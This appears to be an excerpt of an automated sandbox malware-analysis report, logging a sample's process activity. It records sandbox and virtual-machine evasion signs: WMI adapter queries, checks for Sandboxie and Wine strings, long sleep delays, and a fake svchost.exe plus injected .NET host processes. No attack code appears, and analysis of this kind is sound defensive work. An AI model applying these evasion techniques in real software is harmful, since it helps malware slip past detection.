Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7280, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: LisectAVT_2403002A_29.exe, 00000001.00000002.2287115517.0000021D90C2C000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_29.exe, 00000001.00000002.2287115517.0000021D9084F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.2390489517.00000214422A8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2462594062.000001704247C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2542834623.00000191004DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: LisectAVT_2403002A_29.exe, 00000001.00000002.2287115517.0000021D90C2C000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_29.exe, 00000001.00000002.2287115517.0000021D9084F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.2390489517.00000214422A8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2462594062.000001704247C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2542834623.00000191004DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Memory allocated: 21D8EF00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Memory allocated: 21DA8750000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 1F2321E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 1F24BFA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 214421D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 2145A1D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 11E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2AC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 4AC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Memory allocated: 2EC0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Memory allocated: 3040000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Memory allocated: 5040000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 17040590000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 17059FA0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: E40000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2A10000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2760000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 191755F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 191755F0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2C60000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2C90000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 4C90000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 1096	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 4372	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Window / User API: threadDelayed 3503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Window / User API: threadDelayed 2292
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 2627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 4839
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 2307
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 2663

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe TID: 2104	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1432	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2012	Thread sleep count: 1096 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -99874s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2012	Thread sleep count: 4372 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -99766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -99436s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -99324s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -99219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -99109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -98987s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -98843s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -98469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -98328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -98218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -98109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -97997s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -97891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -97781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -97672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -97562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -97453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -97344s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -97233s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -97124s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -97016s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -96906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -96797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932	Thread sleep time: -96683s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -100000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 6976	Thread sleep count: 3503 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -99873s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -99766s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -99656s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -99541s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -99433s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -99195s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -99094s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -98969s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -98859s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 6976	Thread sleep count: 2292 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -98750s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -98641s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -98531s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -98422s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -98312s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -98203s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -98094s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -97984s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -97872s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -97766s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -97641s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -97516s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -97406s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -97297s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -97183s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -97075s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -96954s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -96767s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -96641s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -96516s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -96391s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 3300	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -100000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep count: 2627 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -99888s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500	Thread sleep count: 4839 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -99781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -99672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -99547s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -99437s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -99328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -99218s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -99083s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -98895s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -98781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -98671s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -98562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -98453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -98343s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -98219s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -98094s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -97984s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -97874s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -97765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -97656s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -97546s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -97437s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -97328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -97214s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -97109s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -96999s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -96874s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -96765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -96655s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -96545s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -96437s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -96328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -96216s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -96108s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -95999s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -95890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7492	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -100000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800	Thread sleep count: 2307 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -99890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7800	Thread sleep count: 2663 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -99781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -99672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -99562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -99453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -99343s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -99234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -99124s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -99014s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -98906s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -98796s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -98687s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -98578s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -98468s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -98359s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -98249s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -98140s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -98031s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -97722s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -97594s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -97455s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -97328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -97219s >= -30000s
